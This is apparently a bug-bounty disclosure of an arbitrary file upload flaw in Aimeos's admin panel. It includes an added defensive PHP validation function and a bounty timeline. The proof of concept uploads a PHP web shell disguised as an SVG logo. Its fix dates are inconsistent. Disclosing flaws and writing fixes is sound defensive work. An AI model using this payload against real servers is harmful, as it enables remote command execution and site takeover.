Arbitrary file upload in aimeos/ai-admin-jqadm

Valid

Reported on

Aug 14th 2023


Description

Due to a lack of file extension validation, a privileged user (an administrator) can upload arbitrary files through the "update logo" and "update icon" features. The application uses the extension provided in the filename parameter of the multipart request to name the stored file.

Proof of Concept

POST /admin/default/jqadm/save/settings?locale=en HTTP/1.1
...
------WebKitFormBoundaryAG74QWXOFzNc5cbH
Content-Disposition: form-data; name="media[logo]"; filename="test.php"
Content-Type: image/svg+xml

<svg>
  /* <![CDATA[ */
    <?php system($_GET['c']);
?>
 /* ]]> */
</svg>
...

A request crafted this way will lead to a "logo.php" file being created.

Impact

This leads to Remote Code Execution in versions that still use the vulnerable "enshrined/svg-sanitize" library for sanitization (deployments that didn't upgrade since 2022.10.13). In newer versions there is no significant direct impact, but the arbitrary file upload is still present in versions prior to 2023.07.3 and could be used as part of a more complex exploit chain if additional vulnerabilities are discovered.
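The root cause described above is that the stored extension comes from the client-controlled filename parameter. As an added example, not code from the Aimeos project, this PHP function shows the defender-side fix: derive the stored extension from the detected content type and an allowlist, and reject any upload whose client extension disagrees with it. The function name safeLogoFilename and the log messages are hypothetical; it assumes PHP's fileinfo extension is available.

```php
<?php
// Added example (not Aimeos code): choose the stored filename for an uploaded
// logo or icon without trusting the client-supplied extension.
declare(strict_types=1);

// Allowlisted image types: detected MIME type => extension to store with.
const ALLOWED_IMAGE_TYPES = [
    'image/png'     => 'png',
    'image/jpeg'    => 'jpg',
    'image/gif'     => 'gif',
    'image/svg+xml' => 'svg',
];

/**
 * Returns the safe target filename (e.g. "logo.png"), or null if the upload
 * must be rejected. $base is a fixed name such as "logo" or "icon", $contents
 * the raw uploaded bytes, $clientName the filename parameter from the request
 * (used only for the extension check and for logging, never for the stored name).
 */
function safeLogoFilename(string $base, string $contents, string $clientName): ?string
{
    // 1. Detect the type from the bytes, not from the filename or the
    //    client-sent Content-Type header (both are attacker-controlled).
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->buffer($contents) ?: 'application/octet-stream';

    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        error_log("rejected upload '$clientName': detected type $mime is not allowed");
        return null;
    }

    // 2. The client extension must agree with the detected type. A request
    //    sending filename="test.php" with SVG content fails here: the bytes may
    //    pass as an image, but ".php" is never an accepted extension.
    $clientExt = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $acceptedExts = [ALLOWED_IMAGE_TYPES[$mime]];
    if ($mime === 'image/jpeg') {
        $acceptedExts[] = 'jpeg';
    }
    if (!in_array($clientExt, $acceptedExts, true)) {
        error_log("rejected upload '$clientName': extension '$clientExt' does not match $mime");
        return null;
    }

    // 3. Build the stored name from the fixed base and the allowlisted
    //    extension only. SVG content still needs a separate sanitisation
    //    step before it is served, as the Impact section notes.
    return $base . '.' . ALLOWED_IMAGE_TYPES[$mime];
}
```

Storing under a name the server chooses (step 3) is what removes the ".php" outcome entirely; the extension check in step 2 is the defence-in-depth layer that also catches mismatched but otherwise allowlisted extensions.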

We are processing your report and will contact the aimeos/ai-admin-jqadm team within 24 hours. a month ago
We have contacted a member of the aimeos/ai-admin-jqadm team and are waiting to hear back a month ago
Aimeos validated this vulnerability a month ago
Stan has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Aimeos marked this as fixed in 2022.10.13 with commit bfd722 a month ago
Aimeos has been awarded the fix bounty
This vulnerability will not receive a CVE
Aimeos published this vulnerability a month ago
Standard.php#L317 has been validated
Standard.php#L359 has been validated
m4noo
a month ago

how to build

Stan
a month ago

Researcher

Any chance of registering a CVE for this? We've discussed it in the original report, but maybe you've changed your mind
